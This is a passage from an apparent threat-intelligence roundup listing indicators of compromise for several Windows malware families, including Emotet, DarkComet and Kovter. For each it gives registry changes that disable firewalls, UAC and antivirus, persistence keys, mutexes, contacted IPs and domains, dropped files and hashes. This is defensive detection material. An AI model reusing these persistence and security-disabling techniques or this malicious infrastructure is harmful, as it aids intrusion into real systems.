\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\n15
File Hashes
  • 07c405ee534570f541b59cdaa0f96ff7504589dd26b9e2c6f71e5b89b70fe77f
  • 105a3a1a379be2fc1efe05678726a2ff34183a3f6453af7fe11d3c93b00a06c1
  • 1f286fca031ace5bcd5d09af6aa0bbe2e01d709274ac02db69409b24d1605f63
  • 2334dabfb999ed340bb820f8db859248c8bda0345c044271effb482e08663397
  • 23b236a0c3a4f078b90afb13fb32d0c3f6bdd11b301cad889729699664f2e5e8
  • 2a7ec665835825ff43db2b82df1884ee5d481ef371ad4c3f8ce0e4e18bd9a2a4
  • 550ad9dda25a0f1130dd0da04ddef0621a1158db98a5c5ebf90113842c2164e8
  • 68ec8422d27625d1af4e31d6fccadd07f71cc055761b417d141a1865e58e6886
  • a68f8aa154a3c12d066e1876619eeee00034692251e4e1edd23c8c7028e9518d
  • a7f5fe66ec05e1672d7ce83e0745c028fb366c3341c8e1a907c99087dab346fc
  • b08915d6e08d92a3de5977effd344b6e22b2b0aafce2479a1aadd4842c159ab3
  • b7540ca2429a0ea057c84962b1ddb211dc20ac018b593dec8cb2501a74ab11a4
  • bdfb9125073845bdc6bebf19a27fa02d248dac1f7fe4c59fd0b677e8a0ec9f65
  • c2dc4f333f3ae35f5d40363a69639756e7b4533db364cb20f838543935510d1d
  • cdc9f0d84b8813ae03d846bf7596130a85151683e65bae067a7a1f44d066561f
  • fc84363a134bd0b2c3686c226773bc9a93e33189b2c606815e909b7d7fff79f7
  • feb2afe93c29bba4bf068e198b1e91ae95add4c104430969ae89f2f4202ba65a

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Dropper.Emotet-6964837-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
3
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer 3
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer 3
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\ASR Writer 3
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
3
<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion 3
MutexesOccurrences
60F16AAB662B6A5DA3F649835F6E212598B68E3C4
{7930D12C-1D38-EB63-89CF-4C8161B79ED4}3
\BaseNamedObjects\{137A1518-4964-635A-544B-7A4CB2C11D0D}3
\BaseNamedObjects\{137A1A2C-4964-635A-544B-7A4CB2C11D0D}3
\BaseNamedObjects\{137A2419-4964-635A-544B-7A4CB2C11D0D}3
\BaseNamedObjects\{137A1A2D-4964-635A-544B-7A4CB2C11D0D}3
Global\I98B68E3C2
Global\M98B68E3C2
\BaseNamedObjects\Global\M3C28B0E42
\BaseNamedObjects\Global\I3C28B0E42
MC8D2645C2
\BaseNamedObjects\M19FB4341
\BaseNamedObjects\111OurStarterProcessMutex1111
\BaseNamedObjects\222OurMainProcessMutex2221
98B6-8E3C1
M1CC2778A1
M10F364031
\BaseNamedObjects\A0E8BDA3AF02242419905B05DA0C46C13C28B0E41
\BaseNamedObjects\M10E3D08B1
\BaseNamedObjects\{137A1956-4964-635A-544B-7A4CB4C11D0D}1
\BaseNamedObjects\{137A1956-4964-635A-544B-7A4CBC291D0D}1
\BaseNamedObjects\MEE098981
\BaseNamedObjects\{137A1956-4964-635A-544B-7A4CB7411D0D}1
\BaseNamedObjects\3C28-B0E41
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
23[.]41[.]248[.]1944
23[.]5[.]231[.]2254
23[.]52[.]7[.]204
104[.]88[.]26[.]2454
173[.]223[.]236[.]2154
13[.]107[.]21[.]2003
96[.]6[.]27[.]903
87[.]106[.]190[.]1533
172[.]217[.]12[.]1742
178[.]162[.]217[.]1072
166[.]78[.]144[.]802
204[.]79[.]197[.]2001
172[.]217[.]10[.]1101
178[.]162[.]203[.]2261
85[.]17[.]31[.]821
172[.]217[.]5[.]2381
136[.]243[.]154[.]861
23[.]221[.]50[.]1221
23[.]218[.]141[.]311
209[.]34[.]241[.]2021
23[.]218[.]127[.]1641
23[.]46[.]53[.]711
5[.]196[.]73[.]1501
184[.]107[.]147[.]181
23[.]6[.]69[.]991
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
outlook[.]com4
www[.]java[.]com4
www[.]onenote[.]com4
dev[.]windowsphone[.]com4
www[.]msn[.]com4
web[.]skype[.]com4
java[.]com4
BROMNTUUD[.]XYZ4
trenkulotd[.]xyz4
QBULINTULU[.]XYZ4
TRETITNUNI[.]TOP4
www[.]torproject[.]org3
supp7[.]freshdesk[.]com3
n224ezvhg4sgyamb[.]onion3
ygqqaluei[.]com2
atw82ye63ymdp[.]com2
warylmiwgo[.]com2
caosusubld[.]com2
bekvfkxfh[.]com2
ydchosmhwljjrq[.]com2
xomeommdilsq[.]com2
xxsmtenwak[.]com2
wwyreaohjbdyrajxif[.]com2
grbjgfprk[.]com2
mdofetubarhorbvauf[.]com2
See JSON for more IOCs
Files and or directories createdOccurrences
%HOMEPATH%\NTUSER.DAT4
%HOMEPATH%\ntuser.dat.LOG14
%APPDATA%\Microsoft\gawbgrrs4
%APPDATA%\Microsoft\gawbgrrs\jisgivdt.exe4
%LOCALAPPDATA%\bolpidti\judcsgdy.exe3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe3
%HOMEPATH%3
%PUBLIC%\{846ee340-7039-11de-9d20-806e6f6e6963}3
%PUBLIC%\Pictures\Read_ME.html3
%PUBLIC%\Pictures\Sample Pictures\Read_ME.html3
%PUBLIC%\Read_ME.html3
%PUBLIC%\Recorded TV\Read_ME.html3
%PUBLIC%\Recorded TV\Sample Media\Read_ME.html3
%PUBLIC%\Videos\Read_ME.html3
%PUBLIC%\Videos\Sample Videos\Read_ME.html3
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\jumpListCache\Read_ME.html2
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\safebrowsing\Read_ME.html2
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\startupCache\Read_ME.html2
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\thumbnails\Read_ME.html2
%LOCALAPPDATA%\Read_ME.html2
%APPDATA%\Adobe\Acrobat\9.0\JavaScripts\Read_ME.html2
%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Read_ME.html2
%APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\Read_ME.html2
%APPDATA%\Mozilla\Firefox\Read_ME.html2
%HOMEPATH%\Contacts\Read_ME.html2
See JSON for more IOCs
File Hashes
  • 1e04bcdb51abfed7d2093115cbcaec092b5e8840556f172f368c0a62057c7a37
  • 20c8e37dd60b38bbc9af1f55478e1d7618131bcc5bf383378a2bf00c6ffc1a08
  • 2d7102eb62f9f8c523b7500c5b47eb4cadeff07b2980552e5f8f59aede506eb1
  • 42697c161579c4e96b49f91935b12b3ec042ce5bfc5a583e8b44b416eb5fcf8f
  • 433ad951f81e55b63f14fafe5c606532dc08343bb803d149867c767953a94a66
  • 5550f5e1a7f27b537a1de8c945877755f8a89c28376c12ed2a635a6cc6f375b3
  • 7dbcdbf63ed234c18481358441ee78e0c156f3da60bee606c6c52eafa25fe499
  • 8196fe92cc4b2a674b7014b4505ba3339e8ad36a004d03d77b125e1f9aec76ad
  • 8b2699e4d5ac77bdd3674321b114c05e674f30979b0f032c53a4fcf5a3b11aa5
  • bd86fa60126d2c23abd5e75dbd4b6b952550a7ab1c17139ff009bca37729d7d7
  • cdc8557f6b22789a9d4e10149f9c60f94f217bcb1f695b239fe7a12a0dffaa67
  • d77d9f14025de5483c623673b3f5c4bbe8cdd01c55658c25b62970bf1be6a736
  • d9d2d222e053edc845ce56cdc0ff3516f8e962ee226434772609ee8ce6edfc91
  • e63d957b42d76bc73d03a937d1e2267e4f92c0d9ac0b678124785ea14ce9b991
  • e6c00d963b75e7e5e3f037d54dd3d7099f92dfae0cda82fb5d483e6e8ce8b33b
  • f00a7ca48e367919a09a255d040f3321e3a189ecf7533b0233b3299c9f61f207
  • f1e2beb854ed706d5837ebb789373b83ff0a658f717173227f02bcb4e40ad1b8
  • f88c591028ab0a8084ae15fdeee2afcc87be6980198d9c0ff863e9ac4c5a807f

Coverage


Screenshots of Detection

AMP




ThreatGrid



Umbrella



Win.Trojan.Darkkomet-6964750-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\DC3_FEXEC 9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\System 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
5
<HKU>\Software\Microsoft\Windows\CurrentVersion\Policies\System 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
4
<HKLM>\SOFTWARE\Microsoft\Security Center 4
<HKU>\Software\Microsoft\Windows\CurrentVersion\Run 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\Policies 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CurrentVersion 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\Explorern 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicrosoftUpdateService
2
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2 1
<HKLM>\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\189271E573FED295A8C130EAF357A20C4A9F115E 1
<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Data Serivce
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: winupdate
1
MutexesOccurrences
DC_MUTEX-C6LXJS92
DCPERSFWBP1
DC_MUTEX-5E3YFKY1
52hfxfx521
DC_MUTEX-75QQLTV1
DC_MUTEX-P1ZGY191
DC_MUTEX-MZMFQQS1
DC_MUTEX-CNAFSEW1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
69[.]55[.]5[.]2501
12[.]167[.]151[.]1191
216[.]146[.]43[.]701
162[.]88[.]193[.]701
104[.]27[.]193[.]921
104[.]27[.]192[.]921
51[.]38[.]231[.]91
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
dezgorm[.]ddns[.]net2
250[.]5[.]55[.]69[.]in-addr[.]arpa1
checkip[.]dyndns[.]org1
119[.]151[.]167[.]12[.]in-addr[.]arpa1
www[.]whatismyip[.]com1
checkip[.]dyndns[.]com1
worgodd[.]no-ip[.]org1
oliwierze[.]ddns[.]net1
testezinho250[.]no-ip[.]org1
weath[.]ddns[.]net1
sr3u[.]und3rgr0nd[.]tk1
Files and or directories createdOccurrences
%APPDATA%\dclogs7
%HOMEPATH%\Documents\MSDCSC3
%APPDATA%\MSDCSC2
%APPDATA%\MSDCSC\msdcsc.exe2
%HOMEPATH%\My Documents\MSDCSC\ Microsoft Update2
%HOMEPATH%\Documents\MSDCSC\ Microsoft Update2
%SystemRoot%\SysWOW64\MSDCSC1
%SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe1
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe1
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC1
\Documents and Settings\All Users\Start Menu\MSDCSC\msdcsc.exe1
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC\msdcsc.exe1
%HOMEPATH%\My Documents\MSDCSC\msdcsc.exe1
%System32%.exe1
nigzss.txt1
%APPDATA%\svcost1
%APPDATA%\svcost\svcost.exe1
File Hashes
  • 28b4c182eede85890244ea0678da95e9744cdf175dd8748e257064e6e867824d
  • 32f509646e99c7aea9d15d180ec891328fcba9dd156750d370f481dc586d674c
  • 548d4d3ee7271c7b57f7b99c0b1348da5d1c94e7acfe1adc47f296a562af47d0
  • 725fc28899391ced1970b4caffa22f4b92a636a4a5596c587855f4040f93e557
  • a3117c0c2a3d2bbe0bb4bdf2ee37d3bd461c3116ff018277c70aad51498552d5
  • a7e82cc0def7a4884816f9a97e85675cc0d1d4d8db8ea0c01f35f26de41b654e
  • b1c674e44363aae15e87840db0f5a1123e98228a1c33110b41270318cd2f4ada
  • d5f888e61113f8cef35692be3a876caf5ac1bbb6fa7983a28e0a1de0f964cd92
  • f78968d304d87b83e759cedde480ba74011e92fd9701c77207bcdc0935735940
  • f99d91a32c833a44ff5d8f938251401eae021320777e2e6f217948a50f8af428

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Malware.Kryptik-6964485-1


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List 10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mbihas
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: anblid
1
MutexesOccurrences
OneiricOcelot10
OnlineShopFinder10
P79zA00FfF310
PCV5ATULCN10
PJOQT7WD1SAOM10
PSHZ73VLLOAFB10
QuantalQuetzal10
RaringRingtail10
RaspberryManualViewer10
RedParrot10
RouteMatrix10
SSDOptimizerV1310
SoloWrite10
StreamCoder1.010
Tropic81933110
UEFIConfig10
UtopicUnicorn10
VHO9AZB7HDK0WAZMM10
VRK1AlIXBJDA5U3A10
VideoBind10
VirtualDesktopKeeper10
VirtualPrinterDriver10
VividVervet10
WinDuplicity10
WireDefender10
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Files and or directories createdOccurrences
N/A-
File Hashes
  • 06aa0afbdfa537fa2a213bc400553e62935911ff40b2e899c839109b3aa76343
  • 0a8dbca58db6fd04e3b0fcb3ba3a08843676eb43362794b13d2b294b1428a8e5
  • 310433c733a765de4ebad4517cc227c0aa326bd496e9a0971a2c5fb2cc080e05
  • 516873875312e95e415216eecdbb0fe3799559cd774d68dd10f67b2e413cb646
  • 6155690a39ca14c04877424c2292c638910cce74e766d55036e6c3f8133f0c8c
  • 70b6964498ad91dc5cf69bca30abec8c65f549e6f11ce47b62cc999bfe167374
  • 85d7d87f0fa1cd3a5d405274286f4298ac9d66c6cd17bf90d7245bb2e0bc5b8b
  • 94c981cfdc9ec45d961a33c802e24c3c8c50771ed36e66fc5d06e7faaaba602b
  • ab44bd641e6fabcb49e6f7febd81073e296b8df9b868cf6cbadcc8515c089355
  • e1abb836355f1085113d6e4605b0eb941c965720eea05092993b8180756fb738

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Packed.Kovter-6964099-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: svchost.exe
16
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: explorer.exe
16
<HKLM>\SOFTWARE\WOW6432NODE\Policies 16
<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\SystemRestore 16
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
Value Name: DisableConfig
16
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
Value Name: DisableSR
16
<HKCU>\SOFTWARE\MICROSOFT\Internet Explorer\Main\FeatureControl\FEATURE_AJAX_CONNECTIONEVENTS 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\Windows\CurrentVersion\Policies\Explorer\Run 16
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\RATINGS
Value Name: .Default
16
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_AJAX_CONNECTIONEVENTS
Value Name: svchost.exe
16
<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths 16
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\Safer 16
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\WINDOWS
Value Name: þ
16
<HKLM>\SYSTEM\ControlSet001\Control\Windows 16
<HKLM>\SOFTWARE\WOW6432NODE\D1B9ACC6 16
<HKCU>\SOFTWARE\D1B9ACC6 16
<HKLM>\SOFTWARE\WOW6432NODE\D1B9ACC6
Value Name: 3
16
<HKCU>\SOFTWARE\D1B9ACC6
Value Name: 3
16
<HKLM>\SOFTWARE\WOW6432NODE\D1B9ACC6
Value Name: 5
16
<HKCU>\SOFTWARE\D1B9ACC6
Value Name: 5
16
<HKLM>\SOFTWARE\WOW6432NODE\D1B9ACC6
Value Name: 2
16
<HKCU>\SOFTWARE\D1B9ACC6
Value Name: 2
16
<HKCU>\SOFTWARE\D1B9ACC6
Value Name: 4
16
<HKLM>\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore 15
<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings 15
MutexesOccurrences
D1B9ACC616
D1B9ACC6E116
D1B9ACC6C216
D1B9ACC6C116
83EA3AF0E3D35BA8DAAEABE15EF52FFB16
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
fastfront80[.]com15
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\Preferred16
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f7a-10cabfeabcac2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f7a-2ccabfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f77-20cabfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f7a-24cabfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f7b-10cabfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f77-14cabfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f79-13cbbfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f78-13cbbfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\bb5ca9a3-5378-4a8e-a195-7aa28d9ef0c91
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-8f79-2acabfeabcac1
%ProgramData%\Microsoft\{5c7b6c54-f92c-e302-cc6c-11c738737558}\{5c7b6c54-f92c-e302-cc6c-11c738737558}.exe1
%ProgramData%\Microsoft\{51f28878-5ee4-7fc7-2641-51d5b1ab0163}\{51f28878-5ee4-7fc7-2641-51d5b1ab0163}.exe1
%ProgramData%\Microsoft\{2c1f2442-de97-b471-1e5a-e1b8cd979bac}\{2c1f2442-de97-b471-1e5a-e1b8cd979bac}.exe1
%ProgramData%\Microsoft\{98b64c08-f14e-d5bc-4a88-5494c78ae8b5}\{98b64c08-f14e-d5bc-4a88-5494c78ae8b5}.exe1
%ProgramData%\Microsoft\{c5ca3f16-fae8-6d16-a509-2b3ce12f8839}\{c5ca3f16-fae8-6d16-a509-2b3ce12f8839}.exe1
%ProgramData%\Microsoft\{03cb90f2-8403-8565-a4ee-fbb9c4bec76b}\{03cb90f2-8403-8565-a4ee-fbb9c4bec76b}.exe1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\bb5ca9a3-5378-4a8e-8196-7ea28d9ef0c91
%ProgramData%\Microsoft\{9f9c3524-008c-a947-9125-69a3e6df8b87}\{9f9c3524-008c-a947-9125-69a3e6df8b87}.exe1
%ProgramData%\Microsoft\{5590699f-0760-ca35-28f0-aed17ac9b62a}\{5590699f-0760-ca35-28f0-aed17ac9b62a}.exe1
%ProgramData%\Microsoft\{c1735532-f3d2-0705-27fb-c9515444a59c}\{c1735532-f3d2-0705-27fb-c9515444a59c}.exe1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-af75-13cbbfeabcac1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\bb5ca9a3-5378-4a8e-8199-78a28d9ef0c91
%ProgramData%\Microsoft\{349d3e26-16cd-3c5a-17e8-a6b5712e298a}\{349d3e26-16cd-3c5a-17e8-a6b5712e298a}.exe1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\5731e7cd-8311-408b-af7b-2ccabfeabcac1
See JSON for more IOCs
File Hashes
  • 967d47c136b9b0572999085bdf88035b47ac413a0fcc643379235a656c7b19bf
  • baf12e28c9f22bbc6343d8fd52ec0f9bdbec595887a3bb86ac8276b73a6149f0
  • c97d5b490cdb6a003c7fbc4f01d6e96b6eb7daa401fabb91159df441a7c3a414
  • d0e6edab6f229bddae3ba675045d31dae31ecfebc5071bcef6fb5bb75d7114bf
  • d101f5b175f474b2e8f7768e8ae0492f3732a776367b1df256412d2918edeabb
  • d229bf0e951fbb466a7a695021ff001f29b8a14e9236386fa23d64c0292fcabb
  • d7bfc27b9cae97fd12fc37aca51e72e11ad55a545d8fc1ef1cf1262b3a75d1cf
  • e09390b6cac41111e9573db97340727c493b7d61db4bd5f7be5e298bce1feb61
  • e7cf854f13c13b4356b79196b1703033ea820eb9d9c0539202774cfa62f4ddc1
  • ea4109825ea5dd469b35237206639f261ab9dbbc9029f6ff5cbe245e19708253
  • eeb139134e8f9ae9a06f2b88a5d710aff711ba5ad5f653300a2bf4f874d8cf90
  • f26f413104736c1e442bf3fc3d90f7e7ebf37015b8c81c8c8d8a3cb98ca17112
  • f644f06fe38ad3643c026e0a2eda3e0fd17b8dc3e248699d824df192455310e5
  • f76268c3dff77dddabcec092f5bc236cdacab5d052f5bac4ab3b1be932fe2f1e
  • f857b7ea2d8a195080fef9a188eceddd5c35d88bcad8cdc0ad074b937b0b4d71
  • fc8fce6392c14f721d61f41f1fdb794bd3abf8c0edbbe84e6b5f0efed38ca9d7

Coverage


Screenshots of Detection

AMP



ThreatGrid


Win.Malware.Python-6964012-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION\PARAMETERS
Value Name: TrapPollTimeMilliSecs
20
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156Agent 20
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CurrentVersion 20
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION\Parameters 20
<HKLM>\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters 19
MutexesOccurrences
Global\D0E858DF-985E-4907-B7FB-8D732C3FC3B8}20
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
79[.]98[.]145[.]4217
45[.]79[.]77[.]2016
153[.]92[.]4[.]495
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
info[.]abbny[.]com19
info[.]beahh[.]com19
info[.]ackng[.]com19
42[.]pl17
ip[.]42[.]pl17
jsonip[.]com16
Files and or directories createdOccurrences
\TEMP\m2.ps120
\TEMP\mkatz.ini20
\m2.ps119
\mkatz.ini19
%TEMP%\_MEI19082\Crypto.Cipher._AES.pyd4
%TEMP%\_MEI19082\Crypto.Cipher._ARC4.pyd4
%TEMP%\_MEI19082\Crypto.Cipher._DES.pyd4
%TEMP%\_MEI19082\Crypto.Cipher._DES3.pyd4
%TEMP%\_MEI19082\Crypto.Hash._MD4.pyd4
%TEMP%\_MEI19082\Crypto.Hash._SHA256.pyd4
%TEMP%\_MEI19082\Crypto.Random.OSRNG.winrandom.pyd4
%TEMP%\_MEI19082\Crypto.Util._counter.pyd4
%TEMP%\_MEI19082\Crypto.Util.strxor.pyd4
%TEMP%\_MEI19082\Include\pyconfig.h4
%TEMP%\_MEI19082\Microsoft.VC90.CRT.manifest4
%TEMP%\_MEI19082\_ctypes.pyd4
%TEMP%\_MEI19082\_hashlib.pyd4
%TEMP%\_MEI19082\_mssql.pyd4
%TEMP%\_MEI19082\_multiprocessing.pyd4
%TEMP%\_MEI19082\_socket.pyd4
%TEMP%\_MEI19082\_ssl.pyd4
%TEMP%\_MEI19082\bz2.pyd4
%TEMP%\_MEI19082\ii.exe.manifest4
%TEMP%\_MEI19082\msvcm90.dll4
%TEMP%\_MEI19082\msvcp90.dll4
See JSON for more IOCs
File Hashes
  • 2d5c9619b85111c8af13ad75bc334b26713839eed3ac96e9b22447039296aa0e
  • 30117d30a63aaf64648199e3874762f0a31d1c45f35ff73820d3bb65827dbc89
  • 4af89e0f76d112342c2ac7e5cd3696974027a5c771fb4655faa78fefae4774e8
  • 5304995ff9b9ca3d6f597fc2eb1e456125eb5c42dc42df234173e47184df71f2
  • 568db055c4fb8890fe7f3ef0ef3d32c250ac4d997e94571f84b3463805befedb
  • 5795c318c70fd3009a470198ce1ccb6a7d74af59f3758385fe034520d657c45c
  • 59a6c6c90be9cd113afafad6261fce0f23decc1c453ffd3f135e028073fde501
  • 5f6a3155166e492a8acf391d70b334e985d24dfd43b9ea12f5e47a2d7222ea49
